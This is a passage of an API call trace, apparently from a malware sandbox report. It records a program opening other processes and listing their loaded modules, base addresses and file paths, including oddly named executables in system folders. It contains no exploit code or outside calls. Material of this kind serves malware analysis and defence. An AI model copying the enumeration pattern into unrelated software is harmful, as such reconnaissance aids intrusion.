cb=0x18 | out: lpmodinfo=0x2560e10*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0056.296] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0056.296] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0056.296] GetModuleInformation (in: hProcess=0x21c, hModule=0x77710000, lpmodinfo=0x2562fd0, cb=0x18 | out: lpmodinfo=0x2562fd0*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0056.297] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0056.297] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0056.297] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd910000, lpmodinfo=0x25651a0, cb=0x18 | out: lpmodinfo=0x25651a0*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0056.298] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd910000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0056.298] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd910000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0056.299] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff430000, lpmodinfo=0x2567388, cb=0x18 | out: lpmodinfo=0x2567388*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0056.299] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff430000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0056.300] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff430000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0056.300] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff100000, lpmodinfo=0x25695b0, cb=0x18 | out: lpmodinfo=0x25695b0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0056.301] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0056.301] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0056.302] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefee80000, lpmodinfo=0x256b770, cb=0x18 | out: lpmodinfo=0x256b770*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0056.302] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefee80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0056.303] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefee80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0056.303] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdb50000, lpmodinfo=0x256d930, cb=0x18 | out: lpmodinfo=0x256d930*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0056.304] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0056.304] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0056.305] GetModuleInformation (in: hProcess=0x21c, hModule=0x77610000, lpmodinfo=0x256faf0, cb=0x18 | out: lpmodinfo=0x256faf0*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0056.306] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0056.306] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0056.307] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff1c0000, lpmodinfo=0x2571d48, cb=0x18 | out: lpmodinfo=0x2571d48*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0056.308] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0056.308] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0056.309] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff350000, lpmodinfo=0x2573f08, cb=0x18 | out: lpmodinfo=0x2573f08*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0056.310] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0056.311] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0056.311] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff690000, lpmodinfo=0x25760b8, cb=0x18 | out: lpmodinfo=0x25760b8*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0056.312] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff690000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0056.313] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff690000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0056.314] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdf90000, lpmodinfo=0x2578278, cb=0x18 | out: lpmodinfo=0x2578278*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0056.315] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdf90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0056.316] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdf90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0056.317] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff760000, lpmodinfo=0x257a448, cb=0x18 | out: lpmodinfo=0x257a448*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0056.318] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0056.319] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0056.320] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9e20000, lpmodinfo=0x257c608, cb=0x18 | out: lpmodinfo=0x257c608*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0056.321] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9e20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0056.322] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9e20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0056.323] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpmodinfo=0x257e7d8, cb=0x18 | out: lpmodinfo=0x257e7d8*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0056.324] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0056.325] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd1e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0056.326] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff970000, lpmodinfo=0x2580998, cb=0x18 | out: lpmodinfo=0x2580998*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0056.327] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff970000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0056.328] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff970000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0056.329] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9c0000, lpmodinfo=0x2582c70, cb=0x18 | out: lpmodinfo=0x2582c70*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0056.330] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0056.331] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0056.332] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff400000, lpmodinfo=0x2584e20, cb=0x18 | out: lpmodinfo=0x2584e20*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0056.333] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff400000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0056.334] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff400000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0056.335] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9d0000, lpmodinfo=0x2586fe0, cb=0x18 | out: lpmodinfo=0x2586fe0*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0056.337] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0056.338] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0056.339] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd670000, lpmodinfo=0x25891a0, cb=0x18 | out: lpmodinfo=0x25891a0*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0056.340] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd670000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0056.342] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd670000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0056.343] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff360000, lpmodinfo=0x258b388, cb=0x18 | out: lpmodinfo=0x258b388*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0056.344] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff360000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0056.345] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff360000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0056.347] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9b80000, lpmodinfo=0x258d548, cb=0x18 | out: lpmodinfo=0x258d548*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0056.348] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9b80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0056.349] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9b80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0056.351] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd070000, lpmodinfo=0x258f720, cb=0x18 | out: lpmodinfo=0x258f720*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0056.352] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd070000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0056.354] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd070000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0056.355] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcd70000, lpmodinfo=0x25918e0, cb=0x18 | out: lpmodinfo=0x25918e0*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0056.356] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0056.358] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcd70000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0056.359] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd760000, lpmodinfo=0x2593aa0, cb=0x18 | out: lpmodinfo=0x2593aa0*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0056.361] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0056.362] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0056.364] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef98a0000, lpmodinfo=0x2595c70, cb=0x18 | out: lpmodinfo=0x2595c70*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0056.365] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef98a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0056.381] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef98a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0056.383] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9bc0000, lpmodinfo=0x2597e40, cb=0x18 | out: lpmodinfo=0x2597e40*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0056.384] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9bc0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="fastprox.dll") returned 0xc [0056.386] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9bc0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0056.388] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9b90000, lpmodinfo=0x259a018, cb=0x18 | out: lpmodinfo=0x259a018*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0056.389] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9b90000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0056.391] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9b90000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0056.392] GetModuleInformation (in: hProcess=0x21c, hModule=0x779f0000, lpmodinfo=0x259c1d8, cb=0x18 | out: lpmodinfo=0x259c1d8*(lpBaseOfDll=0x779f0000, SizeOfImage=0x7000, EntryPoint=0x779f106c)) returned 1 [0056.394] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x779f0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="PSAPI.DLL") returned 0x9 [0056.396] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x779f0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PSAPI.DLL" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0056.397] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef6e30000, lpmodinfo=0x259e398, cb=0x18 | out: lpmodinfo=0x259e398*(lpBaseOfDll=0x7fef6e30000, SizeOfImage=0x27000, EntryPoint=0x7fef6e4b69c)) returned 1 [0056.399] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef6e30000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="loadperf.dll") returned 0xc [0056.401] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef6e30000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll")) returned 0x20 [0056.403] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb98) returned 0x21c [0056.403] EnumProcessModules (in: hProcess=0x21c, lphModule=0x25a1358, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25a1358, lpcbNeeded=0x41eb20) returned 1 [0056.404] GetModuleInformation (in: hProcess=0x21c, hModule=0x1390000, lpmodinfo=0x25a15c8, cb=0x18 | out: lpmodinfo=0x25a15c8*(lpBaseOfDll=0x1390000, SizeOfImage=0x17000, EntryPoint=0x13914a1)) returned 1 [0056.404] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x1390000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="notepad.exe") returned 0xb [0056.405] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x1390000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\notepad.exe" (normalized: "c:\\program files\\windows portable devices\\notepad.exe")) returned 0x35 [0056.405] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x25a37f0, cb=0x18 | out: lpmodinfo=0x25a37f0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0056.405] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0056.405] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0056.406] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x25a59b0, cb=0x18 | out: lpmodinfo=0x25a59b0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0056.406] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0056.406] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0056.407] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x25a7b70, cb=0x18 | out: lpmodinfo=0x25a7b70*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0056.407] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0056.408] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0056.408] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x25a9d40, cb=0x18 | out: lpmodinfo=0x25a9d40*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0056.409] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0056.409] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0056.410] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa5c) returned 0x21c [0056.410] EnumProcessModules (in: hProcess=0x21c, lphModule=0x25ac450, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25ac450, lpcbNeeded=0x41eb20) returned 1 [0056.410] GetModuleInformation (in: hProcess=0x21c, hModule=0x1300000, lpmodinfo=0x25ac6c0, cb=0x18 | out: lpmodinfo=0x25ac6c0*(lpBaseOfDll=0x1300000, SizeOfImage=0x17000, EntryPoint=0x13014a1)) returned 1 [0056.411] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x1300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="include ten.exe") returned 0xf [0056.411] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x1300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Internet Explorer\\include ten.exe" (normalized: "c:\\program files\\internet explorer\\include ten.exe")) returned 0x32 [0056.411] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x25ae8e8, cb=0x18 | out: lpmodinfo=0x25ae8e8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0056.411] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0056.412] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0056.416] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x25b0aa8, cb=0x18 | out: lpmodinfo=0x25b0aa8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0056.416] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0056.416] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0056.417] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x25b2c68, cb=0x18 | out: lpmodinfo=0x25b2c68*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0056.417] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0056.417] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0056.418] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x25b4e38, cb=0x18 | out: lpmodinfo=0x25b4e38*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0056.418] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0056.419] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0056.419] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x21c [0056.419] EnumProcessModules (in: hProcess=0x21c, lphModule=0x25b7560, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25b7560, lpcbNeeded=0x41eb20) returned 1 [0056.420] GetModuleInformation (in: hProcess=0x21c, hModule=0x1100000, lpmodinfo=0x25b77d0, cb=0x18 | out: lpmodinfo=0x25b77d0*(lpBaseOfDll=0x1100000, SizeOfImage=0x17000, EntryPoint=0x11014a1)) returned 1 [0056.420] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x1100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="tvopportunity.exe") returned 0x11 [0056.420] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x1100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft SQL Server\\tvopportunity.exe" (normalized: "c:\\program files (x86)\\microsoft sql server\\tvopportunity.exe")) returned 0x3d [0056.421] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x25b9a18, cb=0x18 | out: lpmodinfo=0x25b9a18*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0056.421] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: 